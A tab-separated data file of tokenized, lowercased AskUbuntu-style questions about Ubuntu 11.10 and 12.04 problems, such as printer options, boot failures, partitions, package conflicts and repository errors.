132104	what happened to the installable options when adding a printer ?	i am trying to add an network printer ( hp laserjet 9050 ) using the lpd protocol . on previous ubuntu version i was shown a dialog box with installable options where i could specify total printer memory , whether it was a duplex unit , whether to use tray 1 or tray 4 , etc . however in ubuntu 12.04 , i am not given those options anymore . i am now unable to use the network printer . can someone help me ?
132107	re : can not suspend or hibernate asus desktop ubuntu 12.04	i upgraded to ubuntu 12.04 last week and although pleased with the release i 'm disappointed that the suspend and hibernate features are not working . i 've got an asus desktop with a amd athlon ( tm ) 64 x2 dual core processor 5000+ ă 2 . the system seems to suspend and hibernate successfully but then immediately resumes . i have n't found any posts that have helped me resolve this problem . thanks for any help . wayne
132108	kubuntu 11.10 i need to remove the booting file	i had a windows7 `` where i installed kubuntu on using wubi '' and my problem is that i installed a new windows 7 because the last version infected but i forgot to uninstall kubuntu before installing the new windows .so i was n't able to delete the kubuntu and i just deleted all files and folders manually but the problem there still appear in booting process to choose between win7 and kubuntu . i deleted roughly all files related to windows old for the last windows but i still have the problem tried to install new wubi version and uninstall it thinking that i can sove the problem but nothing happens : ( so i hope u can help me to not to see kubuntu through booting process again
132112	how to install nvidia geforce gt525m driver on ubuntu12.04	i installed ubuntu12.04 today and then i found my geforce gt525m not being installed properly.it was n't recognized by ubuntu.but now i want to install gnome3 and it requires my gt525m installed properly.so , what can i do to install my gt525m driver ? or how can i use gnome3 normally ? thank you .
132113	ubuntu-restricted-extras conflict : feature or bug ?	on a fresh 12.04 installation i wanted to install the ubuntu-restricted-extras . therefore it needs to remove libavutil51 and libavcodec53 . so , as there will be installed libavutil-extra-51 and libavcodec-extra-53 , is it a simple substitution or is it a dependency bug , a conflict between the two versions ... ? thanks . ps : btw , what 's the difference between the 'normal ' and the 'extra ' version ?
132114	how can i repair my system if i forgot to remove the gimp registry plugin when using gimp 2.8 ?	i 've installed gimp 2.8 on ubuntu 12.04 forgetting to remove gimp registry plug-in and now i can not open gimp , remove it , repair it and the ubuntu software centre does n't work anymore saying me i 've to repair the dameged packages , but when i try to do it it does n't work ! ! ! how can i solve my problem ? thanks ! ! !
132116	installing ubuntu 12.04 without installing grub	using the ubuntu 12.04 live cd , is possible not to install grub ? in previous versions , there was a checkbox called something like `` skip grub installation '' , now in 12.04 this checkbox is n't there any more .
132120	how to recover splash screen	i am on 11.04.my ubuntu splash screen was replaced by kubuntu after i installed kubuntu-desktop.i followed the answer of daniel kullmann by mistake in this askubuntu link and i lost splash screen.now it shows only a blank screen after boot menu until login screen.i entered the other commands from the same post but changed nothing.how can i get back the splash screen back ?
132121	ethernet connection for realtek rtl8139/810x not working	i installed ubuntu recently and i cant connect to internet ... . i never deal with linux before much but i cant connect to internet and it keeps giving notification wired connection disconnected its working fine on my windows 7 using realtek rtl8139/810x ethernet network card my isp need login on its webpage for connection of internet which i gets automatically after connection to lan but nothing is working on my ubuntu os ... . please help me for this case ... ..
132123	the launcher seldom works	at first upgrade to 12.04 the launcher would not pop out . after the first update it began to work , but it no longer does . i have altered the settings in appearance , and even pressing the super key does not work . i can get hud by tapping , shortcuts by holding , but not launcher by pressing . i have installed docky as a work-around . btw 12.04 has been awesome !
132128	libreoffice 3.5.2.2 in ubuntu 12.04 , request to retrieve documents	i 'm noticing a few bugs in the ubuntu 12.04lts libreoffice here , he is always opening with a request to retrieve documents on file .odf - does it have to do with the fact that the openjdk java is installed .
132131	canon i560-paper size error-with printer driver	just upgraded from 11.10 and been using ubuntu since 9.04 . the canon driver in 11.10 worked ok with a4 paper , but it looks to me as if it prints to a5 size when you select a4 in ubuntu 12.04 . to amplify , selecting a4 paper and 'fit to page ' gives a print preview which is correctly sized and as expected , but when it commits to paper , the print area is half size .
132132	ubuntu 12.04 installation	i thought i would try 12.04 installation on a spare laptop still running 10.04 rather than on my main laptop running on 11.10 . i installed 12.04 over rather than clean . fineâś but i can not login as my normal user ( only as a guest ) so i can not get benefits of over installation . when i try to login as my user and use my password , i get the following message : could not update iceauthority file /home/username/.iceauthority though my password is valid for superuser applications . since then i changed the password via the passwrd command , but i still get the same error message . do you have any suggestions ? if not i will run a clean installation i guess .
132140	how do i drag a file into an open application ?	i ca n't understand how to drag files into running application . for example : i have an image on my desktop or a folder and i want to drag it into libreoffice writer . i have files that i want to attach to an email i am composing . how do i do this ? the only solution i found is to resize the window and then drag the files into the resised application but this is not quick as i would like to do it , specially on netbooks everything was so easy on gnome2 .
132143	stuck on reboot and shutdown	i 've recently installed ubuntu 12.04 and i love it . however i have one problem- i am unable to shutdown or reboot properly . when i shutdown my laptop ( acer aspire 5560 ) it hangs on the 5 dots and stays there . when i reboot my laptop it does shutdown but when it boots back up it stay 's on the purple screen ( no logo what so ever ) thing 's i 've i 'd to stop this : sudo service network-manager stop before shutdown - nothing adding some lines the the grub file - nothing installed other ubuntu versions - nothing sudo shutdown -h now - nothing and some more . at the moment i see a black screen in front of me with the text asking all remaining processes to terminate [ ok ] and the 5 dots with only the last one orange . on other tries i got this thing : modem-manager : could not get the system bus ... ... i first had ubuntu dual boot windows . and then it worked fine . however after a fresh install of ubuntu alone i got this .
132144	is there a fast way to show your desktop	i need to see content on my desktop or a folder just pressing an icon or a couple of keys . how i do this on unity ?
132146	how can i compile and install that patched libata-eh.c file ?	i received a patched file . ( /drivers/ata/libata-eh.c ) from kernel mailing lists . and i have to compile and install it . but i 'm not an expert user really . can anybody explain it simply ? thanks .
132147	ubuntu 12.04 lts wo n't boot	upgraded from 11.10 , now my thinkpad x60 wo n't boot . i 've tried all four different kernals on the boot menu . each generated some different messages but all stalled at some point . desperately need solution.. i 've gotten trusted ubuntu too much perhaps ( have been a user for a few years ) so i have n't backed up my drive.. many thanks for any suggestions..
132152	how can i make the unity 2d shell dodge gnome panel when running both simultaneously ?	i 'm using gnome fallback in 12.04 , and i 'm running the unity 2d shell ( without the unity 2d panel ) and gnome panel . i 've done this by logging in using gnome fallback , and then running unity-2d-shell . this is what it currently looks like : the second picture is my second monitor , ignore it . as you can see , the gnome panel is on top of the unity 2d shell . how can i move the unity 2d shell 28 pixels from the top of the screen ( my gnome panel is 28 pixels in height ) ? edit : i 'm running compiz as well , so i can use the ccsm if anyone has any solution that would require that .
132159	recreate list of installed packages from mounted hd 11.10 into 12.04 ?	i want to recreate the list of installed packages i had in my 11.10 installation into my new 12.04 one . i updated to 12.04 at the same time i bought a new hd , so i can mount the old hd where the old 11.10 system was installed , read the list of installed packages in 11.10 somewhere , and do an apt-get install for each of them . how can i produce the list of installed packages from the mounted hd where my 11.10 was installed ? i ca n't run commands on the 11.10 system since i have already changed the hd , but if the list is somewhere in /var/cache/apt/archives i can look at the mounted hd , that would be the solution for me .
132163	how do i access win7 files through a wubi	after recently installing 12.04 through wubi , windows 7 is now not booting , not even in safe mode . there is one folder on the c drive that i need a copy of which i forgot to backup before installing ubuntu , how do i access this through ubuntu ?
132164	ubuntu-restricted-extras wants to remove over 200 packages . could this harm the system ?	has anybody installed ubuntu-restricted-extras yet ? ( you need this for example to encode mp3 ) . when i try to install that , it wants to remove the following packages : # aptitude install ubuntu-restricted-extras the following new packages will be installed : gstreamer0.10-plugins-bad-multiverse libavcodec-extra-53 { b } libavutil-extra-51 { ab } libfaac0 { a } libmjpegtools-1.9 { a } libquicktime2 { a } ubuntu-restricted-extras unrar 0 packages upgraded , 8 newly installed , 0 to remove and 0 not upgraded . need to get 3,811 kb of archives . after unpacking 9,558 kb will be used . the following packages have unmet dependencies : libavutil-extra-51 : conflicts : libavutil51 but 4:0.8.1-0ubuntu1 is installed . libavcodec-extra-53 : conflicts : libavcodec53 but 4:0.8.1-0ubuntu1 is installed . open : 107 ; closed : 1554 ; defer : 43 ; conflict : 121 othe following actions will resolve these dependencies : remove the following packages : 1 ) bluez-alsa : i386 2 ) glib-networking : i386 3 ) googleearth 4 ) gstreamer0.10-fluendo-mp3 : i386 5 ) gstreamer0.10-plugins-base : i386 6 ) gstreamer0.10-plugins-good : i386 7 ) gstreamer0.10-x : i386 8 ) gtk2-engines : i386 9 ) gtk2-engines-murrine : i386 10 ) gtk2-engines-oxygen : i386 11 ) gtk2-engines-pixbuf : i386 12 ) gvfs : i386 13 ) gvfs-libs : i386 14 ) ia32-libs 15 ) ia32-libs-multiarch : i386 16 ) ibus-gtk : i386 17 ) libaa1 : i386 18 ) libacl1 : i386 19 ) libao4 : i386 20 ) libasn1-8-heimdal : i386 21 ) libasound2 : i386 22 ) libasound2-plugins : i386 23 ) libasyncns0 : i386 24 ) libatk1.0-0 : i386 25 ) libattr1 : i386 26 ) libaudio2 : i386 27 ) libaudiofile1 : i386 28 ) libavahi-client3 : i386 29 ) libavahi-common3 : i386 30 ) libavc1394-0 : i386 31 ) libavcodec53 32 ) libavutil51 33 ) libbz2-1.0 : i386 34 ) libc6 : i386 35 ) libcaca0 : i386 36 ) libcairo-gobject2 : i386 37 ) libcairo2 : i386 38 ) libcanberra-gtk-module : i386 39 ) libcanberra-gtk0 : i386 40 ) libcanberra0 : i386 41 ) libcap2 : i386 42 ) libcapi20-3 : i386 43 ) libcdparanoia0 : i386 44 ) libcomerr2 : i386 45 ) libcroco3 : i386 46 ) libcups2 : i386 47 ) libcupsimage2 : i386 48 ) libcurl3 : i386 49 ) libdatrie1 : i386 50 ) libdb5.1 : i386 51 ) libdbus-1-3 : i386 52 ) libdbus-glib-1-2 : i386 53 ) libdrm-intel1 : i386 54 ) libdrm-nouveau1a : i386 55 ) libdrm-radeon1 : i386 56 ) libdrm2 : i386 57 ) libdv4 : i386 58 ) libelf1 : i386 59 ) libesd0 : i386 60 ) libexif12 : i386 61 ) libexpat1 : i386 62 ) libffi6 : i386 63 ) libflac8 : i386 64 ) libfontconfig1 : i386 65 ) libfreetype6 : i386 66 ) libgail-common : i386 67 ) libgail18 : i386 68 ) libgcc1 : i386 69 ) libgconf-2-4 : i386 70 ) libgcrypt11 : i386 71 ) libgd2-xpm : i386 72 ) libgdbm3 : i386 73 ) libgdk-pixbuf2.0-0 : i386 74 ) libgettextpo0 : i386 75 ) libgl1-mesa-dri : i386 76 ) libgl1-mesa-glx : i386 77 ) libglapi-mesa : i386 78 ) libglib2.0-0 : i386 79 ) libglu1-mesa : i386 80 ) libgnome-keyring0 : i386 81 ) libgnutls26 : i386 82 ) libgomp1 : i386 83 ) libgpg-error0 : i386 84 ) libgphoto2-2 : i386 85 ) libgphoto2-port0 : i386 86 ) libgpm2 : i386 87 ) libgssapi-krb5-2 : i386 88 ) libgssapi3-heimdal : i386 89 ) libgstreamer-plugins-base0.10-0 : i386 90 ) libgstreamer0.10-0 : i386 91 ) libgtk2.0-0 : i386 92 ) libgudev-1.0-0 : i386 93 ) libhcrypto4-heimdal : i386 94 ) libheimbase1-heimdal : i386 95 ) libheimntlm0-heimdal : i386 96 ) libhx509-5-heimdal : i386 97 ) libibus-1.0-0 : i386 98 ) libice6 : i386 99 ) libidn11 : i386 100 ) libiec61883-0 : i386 101 ) libieee1284-3 : i386 102 ) libjack-jackd2-0 : i386 103 ) libjasper1 : i386 104 ) libjpeg-turbo8 : i386 105 ) libjpeg8 : i386 106 ) libjson0 : i386 107 ) libk5crypto3 : i386 108 ) libkeyutils1 : i386 109 ) libkrb5-26-heimdal : i386 110 ) libkrb5-3 : i386 111 ) libkrb5support0 : i386 112 ) liblcms1 : i386 113 ) libldap-2.4-2 : i386 114 ) libllvm3.0 : i386 115 ) libltdl7 : i386 116 ) libmad0 : i386 117 ) libmikmod2 : i386 118 ) libmng1 : i386 119 ) libmpg123-0 : i386 120 ) libmysqlclient18 : i386 121 ) libncurses5 : i386 122 ) libncursesw5 : i386 123 ) libnspr4 : i386 124 ) libnss3 : i386 125 ) libodbc1 : i386 126 ) libogg0 : i386 127 ) liboil0.3 : i386 128 ) libopenal1 : i386 129 ) liborc-0.4-0 : i386 130 ) libp11-kit0 : i386 131 ) libpango1.0-0 : i386 132 ) libpciaccess0 : i386 133 ) libpcre3 : i386 134 ) libpixman-1-0 : i386 135 ) libpng12-0 : i386 136 ) libproxy1 : i386 137 ) libpulse-mainloop-glib0 : i386 138 ) libpulse0 : i386 139 ) libpulsedsp : i386 140 ) libqt4-dbus : i386 141 ) libqt4-declarative : i386 142 ) libqt4-designer : i386 143 ) libqt4-network : i386 144 ) libqt4-opengl : i386 145 ) libqt4-qt3support : i386 146 ) libqt4-script : i386 147 ) libqt4-scripttools : i386 148 ) libqt4-sql : i386 149 ) libqt4-sql-mysql : i386 150 ) libqt4-svg : i386 151 ) libqt4-test : i386 152 ) libqt4-xml : i386 153 ) libqt4-xmlpatterns : i386 154 ) libqtcore4 : i386 155 ) libqtgui4 : i386 156 ) libqtwebkit4 : i386 157 ) libraw1394-11 : i386 158 ) libroken18-heimdal : i386 159 ) librsvg2-2 : i386 160 ) librsvg2-common : i386 161 ) librtmp0 : i386 162 ) libsamplerate0 : i386 163 ) libsane : i386 164 ) libsasl2-2 : i386 165 ) libsasl2-modules : i386 166 ) libsdl-image1.2 : i386 167 ) libsdl-mixer1.2 : i386 168 ) libsdl-net1.2 : i386 169 ) libsdl-ttf2.0-0 : i386 170 ) libsdl1.2debian : i386 171 ) libselinux1 : i386 172 ) libshout3 : i386 173 ) libslang2 : i386 174 ) libsm6 : i386 175 ) libsndfile1 : i386 176 ) libsoup-gnome2.4-1 : i386 177 ) libsoup2.4-1 : i386 178 ) libspeex1 : i386 179 ) libspeexdsp1 : i386 180 ) libsqlite3-0 : i386 181 ) libssl0.9.8 : i386 182 ) libssl1.0.0 : i386 183 ) libstdc++5 : i386 184 ) libstdc++6 : i386 185 ) libtag1-vanilla : i386 186 ) libtag1c2a : i386 187 ) libtasn1-3 : i386 188 ) libtdb1 : i386 189 ) libthai0 : i386 190 ) libtheora0 : i386 191 ) libtiff4 : i386 192 ) libtinfo5 : i386 193 ) libudev0 : i386 194 ) libunistring0 : i386 195 ) libusb-0.1-4 : i386 196 ) libuuid1 : i386 197 ) libv4l-0 : i386 198 ) libv4lconvert0 : i386 199 ) libvisual-0.4-0 : i386 200 ) libvisual-0.4-plugins : i386 201 ) libvorbis0a : i386 202 ) libvorbisenc2 : i386 203 ) libvorbisfile3 : i386 204 ) libwavpack1 : i386 205 ) libwind0-heimdal : i386 206 ) libwrap0 : i386 207 ) libx11-6 : i386 208 ) libx11-xcb1 : i386 209 ) libxau6 : i386 210 ) libxaw7 : i386 211 ) libxcb-glx0 : i386 212 ) libxcb-render0 : i386 213 ) libxcb-shm0 : i386 214 ) libxcb1 : i386 215 ) libxcomposite1 : i386 216 ) libxcursor1 : i386 217 ) libxdamage1 : i386 218 ) libxdmcp6 : i386 219 ) libxext6 : i386 220 ) libxfixes3 : i386 221 ) libxft2 : i386 222 ) libxi6 : i386 223 ) libxinerama1 : i386 224 ) libxml2 : i386 225 ) libxmu6 : i386 226 ) libxp6 : i386 227 ) libxpm4 : i386 228 ) libxrandr2 : i386 229 ) libxrender1 : i386 230 ) libxslt1.1 : i386 231 ) libxss1 : i386 232 ) libxt6 : i386 233 ) libxtst6 : i386 234 ) libxv1 : i386 235 ) libxxf86vm1 : i386 236 ) odbcinst1debian2 : i386 237 ) xaw3dg : i386 238 ) zlib1g : i386 leave the following dependencies unresolved : 239 ) libcanberra-gtk0 : i386 recommends libcanberra-gtk-module : i386 240 ) libgphoto2-2 : i386 recommends udev : i386 ( > = 0.175 ) 241 ) libgphoto2-2 : i386 recommends libgphoto2-l10n : i386 ( > = 2.4.13-1ubuntu1 ) 242 ) libncurses5 : i386 recommends libgpm2 : i386 243 ) libncursesw5 : i386 recommends libgpm2 : i386 244 ) libslang2 : i386 recommends libpng12-0 : i386 245 ) libvisual-0.4-0 : i386 recommends libvisual-0.4-plugins : i386 246 ) libqt4-dbus : i386 recommends qdbus : i386 ( = 4:4.8.1-0ubuntu4.1 ) 247 ) libqtgui4 : i386 recommends libcups2 : i386 some of these packages do n't look so unimportant , so i have some doubts to accept this solution . has anybody installed this packages so far and did n't get any problems ?
132168	access windows 7 files from ubuntu 12.04	i 'm new to ubuntu , so can any of you give me a guide of how i can access my windows 7 files from my ubuntu 12 . i installed it using wubi . looked around everywhere but failed .
132170	resizing my linux partition	so , i was getting rid of my opensuse to install lubuntu . in the process , i did n't manage my hard drive partitions well enough and as a result , i lost my windows 7 partition . i got over the loss , and formatted my entire hard drive by install lubuntu over all the space . ( i tried first installing windows 7 , but i kept getting some weird errors during the partitioning process ) . i was wondering now if i could resize my lubuntu partition so i can install windows 7 again . here is a gparted screenshot : can anyone help me out ? i have all my linux disks and my windows disks . thank you .
132175	how to store a dconf key as read-only ?	i want to use unity-2d 's dodge feature for the dash . i accomplished that by changing the hide-mode value in com.canonical.unity2d.launcher in dconf editor to 2 . however , when i decide to change ubuntu 's wallpaper , the hide-mode value gets reverted to 0 . i want to prevent this by making the setting hide-mode read-only . how can i do this ?
132176	dvd-rw does not mount in ubuntu 12.04 lts	i try to use cds and dvds in my ubuntu precise pangolin ( 12.04 lts ) , but the system does n't mount the dvd-recorder when the dvd or cd is ready to use . what is the solution for this problem ? how ubuntu 12.04 lts can mount optical media ( cd , dvd , blu-ray ) recorders ?
132182	ubuntu wo n't boot after 12.04 upgrade	i installed ubuntu 11.10 a few weeks ago and yesterday i upgraded it to 12.04 . the upgrade manager installed all packages and then asked me to reboot my computer . everything went well , i was able to use it without any problem . today i turned it on and here is my problem : it wo n't boot anymore . when it gets to the login screen it freezes . i tried opening a terminal with ctrl+alt+f1 but it woul n't open . i rebooted and tried booting with a older kernel version but it did n't work . then i booted from the recovery and tried to fix it but i could n't . when i was at the recovery menu i tried to activate the network option , but the network-manager failed and the system freezed . i think that may be the problem , but i do n't know how to fix it . thank you for your help .
132185	gnome shell terminal	i was wondering if it is it possible to embed a fully transparent terminal , without menu or border shadows , to the desktop as a gnome-shell extension ? i have followed some online forums and instructions given , but the do nt work , as they are either using compiz or eyecandy screenlets . under gnome 3 i found no solutions . i 'm using ubuntu 12.04 with gnome-shell . thx p.s . why is the topic closed ? i 've checked all other similar topics , not one deals with the terminal being a gnome shell extension . it 's either a screenlet ( which does n't work on gnome-shell ) , devilspie ( again does n't work for me on 12.04 with gnome-shell ) or ccsm . so my question then is how to embed ( by this i mean not a transparent movable window , but a immovable extension ) it on gnome-shell .
132186	create a new user in 12.04 ?	i tried to create a new user in 12.04 using the `` users menu '' , but although the user guest has been created , i never got asked a password . so when i logout and try to login as guest , i get asked a password which i do n't know . how can i solve this ? simply hitting enter when asked for the password wo n't be accepted as a valid password .
132191	how to delete and/or merge dev/sda5 logical filesystem ?	i recently installed ubuntu 12.04 onto my primary computer , replacing ubuntu 11.10 . i used the fresh install method , wiping all data off of the hdd and starting from scratch using a flash drive for the 12.04 installation . upon first boot at the ubuntu loading screen , a message appears indicating ubuntu is mounting a separate partition . it gives me the option to wait , or cancel and mount manually later . i have never made a separate partition , but for some reason i had a 1 gb sized partition laying around on my system after installation . i do n't know why or how it is there , because like i said i just installed 12.04 . the partition is a logical , 1012 mb sized unknown file system . so , my question is , i would like to know if i can merge it back into my primary partition . because the partition slows boot up time , and is pretty useless to me . i would also like to know what exactly happened , and how i can prevent it in the future . thanks !
132193	alt-tab behavior	couple of alt+tab issues ( ubuntu 12.04 ) : currently alt+tab only switches between windows in the current workplace . how do i expend it to all ? the icons when switching are tiny . any way to make them bigger ?
132195	how to permanently turn off wired network in ubuntu 12.04	i 'm using ubuntu 12.04 64 bits with wireless . but every time the computer starts up it is trying to connect to wired network , even if i 'm already connected to wireless every 10 of 15 minutes it is trying to connect to wired , unless i am not going to network setup and turning off wired . but ubuntu never remembers this change , after restart its the same ...
132200	alt+f10 to maximise window in 12.04 with gnome-classic no effects ?	how can i use alt+f10 to maximise window in 12.04 with gnome-classic no effects ? i was able to use it in 11.10 , but now , if i am in gnome-terminal and i want to maximise it , i get a symbol ; 3~ and nothing happens .
132201	pecl extension in ubuntu 11.10	i was installing mediawiki on my local development machine and in the configuration , it told me that i will have to make do with slower loading tradition php pages because i dont have a pecl extension installed . does installing pecl really speed up page load times on a local server ( or any server ) ? if yes , can i please have a detailed tutorial on how to install pecl and configure it that says more than just sudo apt-get install pecl-php ?
132203	how do i recover my repos ?	i 've messed up with repos . how do i get the default list of repos back ? what about the keys i 've probably have installed - but would not be used - if i 'd roll back to the default repo list ? edit : here 's the full story . on updating to kubuntu 12.04 - virtuoso-t started to give some error ( it kubuntu tells me that is crashes on start up ) . i thought - re-installation would solve the problem . so i made a complete re-installation of nepomuk . i did n't notice - but it has also removed my kde ! so on restart i 've login to gnome session . so i get to the internet , opened a synaptic - and tried to install kubuntu-desktop . but it turns out to be a some dependency problem - nobody were to provide a plasma-desktop libs and so on . so i used the ubuntu repos generator ( link is in the answers - i always get there by googling ) . but it did n't help . finally i found a machine with kubuntu 11.10 - i 've started an update process - have waited until /etc/apt got updated , took it to my machine - no luck again : dependecy problems . finally adding : sudo add-apt-repository ppa : kubuntu-ppa/ppa sudo add-apt-repository ppa : kubuntu-ppa/backports sudo add-apt-repository ppa : kubuntu-ppa/beta have solved it all .
132204	my default home lens changed after upgrading . is that normal ?	after i upgraded to 12.04 from 11.10 , my home lens ( the default lens when you press super key ) seems broken . it no long shows default six big icons that were there previously in 11.10 , but instead seems to show the apps lens . why is this ? is it a bug ?
132209	ubuntu 12.04 installation cd is not booting ?	i am using ubuntu 8.10 and want to upgrade it to 12.04 . i have downloaded 12.04 from the ubuntu site and burned as iso image cd in a dvd ( because it is 701.3mb ) . when i insert this dvd into my drive for installation , it does not boot . a blank black screen appears . in 8.10 when i click on update to 9.04 it shows some error . ubuntu 8.10 is not as good as 12.04 . please friends help me to solve this problem . i want to install ubuntu 12.04 in my pc .
132210	shotwell with dropbox	i import all my photos with shotwell into a folder within my dropbox so all the photos are available to other devices . however , most importing is done on linux laptop and while photos are available on the linux desktop ( a separate machine ) the databases seem to be different so i have difficulty locating photos . can anyone suggest a remedy ? supplementary question - if i add tags to the photos on , say the desktop , are these applied on the laptop as well ?
132217	12.04 ubuntu - sharing wireless internet connection with freesat through ethernet !	i 'm trying to share my ubuntu 's 12.04 ( desktop ) wireless ( wlan0 ) internet connection with a freesat box through ethernet ( eth0 ) . i 've set up the wired connection ipv4 settings `` share with other computers '' and i 'm getting a wired connection but unfortunately the freesat box ca n't seem to automatically configure the network settings . available manual network settings ( freesat box ) : ip address , subnet mask , router address , dns address if i try to configure the freesat box manually will i need to configure the wired ( eth0 ) settings differently in ubuntu .
132219	ubuntu 12.04 lts often get a black screen with mouse cursor when trying to resume from lock screen .	updated from 11.10 to 12.04 after fresh install , often the lock screen will give me a black screen with a mouse cursor instead of the usual . this occurs most often while the ubuntu software center is open or left unattended for a long period of time . i have a mouse cursor i can move and even select the area where i would enter my password . if typed in and i press enter i can no longer select the text area like it logged in , yet still have a black screen . i can enter the terminal and the ctrl+alt+del to restart the computer in order to get back in . is there any fix for this or a way to get back to the gui without restarting the whole computer ?
132220	how do i convert a desktop install into a server ?	i installed ubuntu with an alternate cd ( for software raid ) , not realizing that that installs a desktop version ( or perhaps i missed a menu option ? ) , while i wanted to install the server version . so , how can i convert a desktop installation into a server installation . is it just a matter of removing packages ? ( i do n't need it to be 100 % the same as a clean server installation , just want to optimize the os for being a server )
132223	how to sync iphone in ubuntu 12.04 ?	how i 'm looking for a simple and convenient way of transferring music from my ubuntu 12.04 machine with my iphone 4 . i'v read that this is now possible in 12.04 but i have yet to see any evidence . each time i sync my iphone with ryhthmbox it appears to sync but the music is never on my iphone . thanks in advance for any help .
132227	ubuntu software center hangs when installing software while other software is queued	when installing software via software center i have no problems if there is no queue . if anything is queued up , however , any installing software hangs at applying changes . any thoughts on this ? i recently upgraded to 12.04 from 11.10 and had no problems before .
132229	notifications not working in gnome 3.4	notifications are no longer working in gnome 3.4 but they are working in unity . i have tried everything i can think of but i am stumped . to clarify , i am changing the theme using gnome tweak . themes were obtained from various repositories including noobslab/themes and webupd8 . as an example , when using the default theme adwaita , i get all notifications when using rhythmbox as to what song is being played on an internet radio station . i even tried a different media player with the same result . when i change the theme , all i get is a media player icon . change back to default theme and all notifications work fine . notifications were working at first with all themes , but no longer . the question is how to get notifications to work for all themes . they did for previous versions of gnome-shell .
132232	any way of changing the partition size of a ubuntu install from inside the install ?	is there anyway to change the partition size of ubuntu while using ubuntu ? i currently have 2 partitions and would like to shrink the one i have ubuntu installed on to make a storage partition so i can easily format and reinstall without constantly backing up personal files .
132239	installing ubuntu from usb pendrive on hard disk	i have downloaded ubuntu 12.04 desktop iso . i wish to install this on my laptop and replace the existing windows xp ( sp3 ) with ubuntu . unfortunately i do not have a working cdrom drive on my laptop . is it possible to copy the iso file on pendrive and then install ubuntu on hard disk ? i do n't wish to run ubuntu off the pen drive and would rather install it on hard disk itself . any help would be appreciated .
132242	ca n't open apt-url links from playdeb in chromium on lubuntu	chromium asks me if i want to open an external application , i click yes and it just opens a new window . i followed all steps on the playdeb-website on how to install games via the website .
132245	set cinnamon as default startup on live cd/dvd	i have build an ubuntu remix with uck , ubuntu customization kit and have installed cinnamon via ppa . now i want the live dvd to start with cinnamon directly . how to do this ? terminal command maybe ?
132255	specify who can connect	i 've just installed vsftpd , which i always liked for its ease of use , but i ca n't find something ... can anyone give me instructions on how i can specify which ip addresses are allowed to connect ? basically what i want as a result is this : you can only login with the user robin , with the correct password . you can read , but not write anything . only 192.168.1.7 is allowed to connect .
132257	unable to install any version of ubuntu in my laptop	i have msi -cr400 laptop . configuration of msi-cr400 intel ( r ) core ( tm ) 2 duo cpu t6600 @ 2.2o ghz ram 4.00 gb video card : nvidia geforce 8200m â 512mb [ 256mb vram + 256mb ( system shared ) ] hard drive : western digital 250gb i dont know why i am unable to install any version of ubuntu . i tried with usb stick as well as live cd . but process always hangs sometimes on 47 % , sometimes on 76 % . i also try to install with acpi-off . but installation always freezes . i read that problem is due to nvidia graphics card . kinldy suggest me . i also try ubuntu 12.04 lts but its hangs on first page . it just show its native violet screen and freezes my all system and i have to manually off the system . kinldy help me on this issue . i need ubuntu on priority.m an android developer and ubuntu is best of it . kindly suggest me , ubuntu is working fine on my desktop and other laptop .
132259	3g huawei e220 can not connect to the net ubuntu 12.04	i 've upgraded from 10.10 to 12.04 . the situation : i plug the dongle in and enter the password . if i click 'enable mobile broadband ' and i get a notice on the top right saying 'gsm network . you are now registered on the home network ' . at this stage i have not actually connected and when i click my broadband connection i see that 'enable mobile boardband ' is unticked again and i can not connect to my broadbnad connection when i click it .
132260	how can i remove the ubuntu 11.04 disk partition so that there is enough free disk space to install 12.04 ?	when i installed ubuntu 11.04 i took the default disk partition size , and it turned out to be too small , so now i 'm having problems . i want to uninstall 11.04 and install 12.04 , but unless i can undo the current disk partition and remove 11.04 i ca n't add another partition large enough to run ubuntu 12.04 . +help !
132262	booting in kiosk mode	how can we configure the machine to boot directly into a restricted interface , with limited options that we can configure ? this is to make a kiosk machine .
132268	ubuntu crash problem	i 'm using ubuntu 11.04 . i accidently removed libpng from the system and after that i 'm not able to get to my desktop . everytime i restart the system , after ubuntu logo all is the login screen and after that i can only access the virtual terminals but i 'm unable to get my desktop . what should i do to get back to my desktop ?
132269	how to resolve the `` failed to download repository '' error ?	i 've tried to update but then i got this error here 's the error information in that box : w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > , w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . and my internet connection is working fine . after trying $ sudo apt-get install ppa-purge reading package lists ... done building dependency tree reading state information ... done ppa-purge is already the newest version . the following packages were automatically installed and are no longer required : language-pack-zh-hans language-pack-kde-en language-pack-kde-zh-hans language-pack-kde-en-base kde-l10n-engb kde-l10n-zhcn language-pack-zh-hans-base firefox-locale-zh-hans language-pack-kde-zh-hans-base use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo ppa-purge ppa : unity-team/hud updating packages lists w : gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . warning : apt-get update failed for some reason ppa to be removed : unity-team hud warning : could not find package list for ppa : unity-team hud i 've tried $ sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 16126d3a3e5c1192 executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.v6ucus0b10 -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- recv-keys -- keyserver keyserver.ubuntu.com 16126d3a3e5c1192 gpg : requesting key 3e5c1192 from hkp server keyserver.ubuntu.com gpg : key 3e5c1192 : `` ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 and then started the same procedure but of no use .
132270	how do i install cinnamon on ubuntu server ?	how do i install cinnamon and mate on ubuntu server 12.04 ? what are the dependencies ? when i install cinnamon it does n't start when i start the system and when i try to use it with startx command i shows a `` failed to load session `` ubuntu '' `` error while entering the desktop gui . with mate it also does n't start automatically and when i start it with startx some icons are broken and the locale appears to have some problems with the pt_br special characters .
